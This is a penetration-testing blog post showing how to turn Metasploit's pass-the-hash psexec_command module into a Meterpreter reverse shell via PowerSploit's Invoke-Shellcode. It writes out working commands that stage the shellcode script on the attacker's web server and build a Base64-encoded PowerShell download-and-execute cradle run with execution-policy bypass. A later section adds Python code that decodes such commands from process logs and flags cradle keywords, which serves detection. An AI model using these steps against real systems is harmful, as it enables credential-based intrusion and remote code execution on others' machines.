Metasploit has supported psexec-like functionality with pass-the-hash for several years. Unfortunately, it's mostly useless when an AV product is there to delete the uploaded service binary. Recently, a module (auxiliary/admin/smb/psexec_command) was created that allows you to run a single Windows command with discovered hashes or credentials. This doesn't flag AV, but it isn't the full meterpreter shell that we're used to. How can we turn one command into a meterpreter shell? With PowerSploit and Matt Graeber's Invoke-Shellcode!
The basic steps:
Kali Linux is awesome, but the version of PowerSploit it ships is currently outdated, so let's pull down the script we will eventually run:
wget -O /var/www/payload https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1
Next, we need to append the appropriate function call with the LHOST and LPORT parameters and ensure that Apache is running (the two variables are placeholders you set to your listener's address and port):
lhost="<KALI_IP>"; lport="<HANDLER_PORT>"   # placeholders: your listener address and port
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> /var/www/payload
strings -es /var/www/payload
[Screenshot: Call to Function Added]
Basically, we are going to Base64-encode a short script block which will pull down the rest of our script. PowerShell's -EncodedCommand expects Base64 of the UTF-16LE bytes, which is what the iconv step provides:
# Single quotes inside the double-quoted bash string survive into the PowerShell code; nested double quotes would not.
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://$lhost/payload')"
# -n keeps echo's trailing newline out of the encoded payload.
encode="$(echo -n "$scriptblock" | iconv --to-code UTF-16LE | base64 -w 0)"
command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"
echo "$command"
Now we fill in the rest of the module's settings (either a password or a hash) and set the COMMAND parameter to the encoded command:
[Screenshot: Add Command to psexec_command]
Next, we start the multi/handler with reverse_https:
[Screenshot: Set Up Handler]
[Screenshot: Get Your Shell]
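From the other side of the wire, the encoded command built in the steps above is exactly what lands in a process-creation log, and the -Enc blob is trivial to unwind. The following is an added example, not code from this post or from PowerSploit: it reverses the UTF-16LE + Base64 transform the way PowerShell does and flags the download-cradle keywords in the result. The log lines, the LHOST_PLACEHOLDER host and the indicator list are constructed for the example.

```python
import base64
import re

# Constructed sample: the stager this post builds, as it would appear inside the
# -Enc argument of a process-creation event. The host is a labelled placeholder.
STAGER = "iex (New-Object Net.WebClient).DownloadString('http://LHOST_PLACEHOLDER/payload')"

def encode_command(script: str) -> str:
    """-EncodedCommand value: Base64 of the script's UTF-16LE bytes (same as iconv | base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation command lines; only the first carries the stager.
SAMPLE_LOGS = [
    "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc " + encode_command(STAGER),
    "powershell.exe -NoProfile -Command Get-Service",
    "notepad.exe C:\\Users\\alice\\notes.txt",
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Substrings typical of a download-and-execute cradle; "iex" alone can false-positive.
CRADLE_INDICATORS = ("downloadstring", "iex", "invoke-expression", "invoke-shellcode", "net.webclient")

def decode_encoded_command(cmdline: str):
    """Return the script carried by -Enc, or None if the flag is absent or the blob is malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # bad Base64 or an odd byte count: not a valid UTF-16LE payload

def find_indicators(script: str) -> list:
    low = script.lower()
    return [word for word in CRADLE_INDICATORS if word in low]

def triage(cmdline: str) -> dict:
    """Decode the command line (if encoded) and flag cradle indicators in the plaintext."""
    decoded = decode_encoded_command(cmdline)
    indicators = find_indicators(decoded) if decoded else []
    return {"encoded": decoded is not None, "decoded": decoded,
            "indicators": indicators, "suspicious": bool(indicators)}

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        result = triage(line)
        print(f"{'ALERT' if result['suspicious'] else 'ok   '} {line[:60]} -> {result['indicators']}")
```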
As soon as the PTH-Suite is ported to Kali, I hope to show you how to accomplish all of this without writing anything to disk!
***Updated 8/8/2013
So after a few comments and working through encoding issues with several people I finally realized that the actual posted code was incomplete. Instead of working from the post, I continued to work from my own script which was just simply not smart. So I added a screenshot for extra clarity and I apologize to anyone that this frustrated. On the positive side, now there are loads of other ways to pull this off which I wrote about here and you can read more about here and here.
-Chris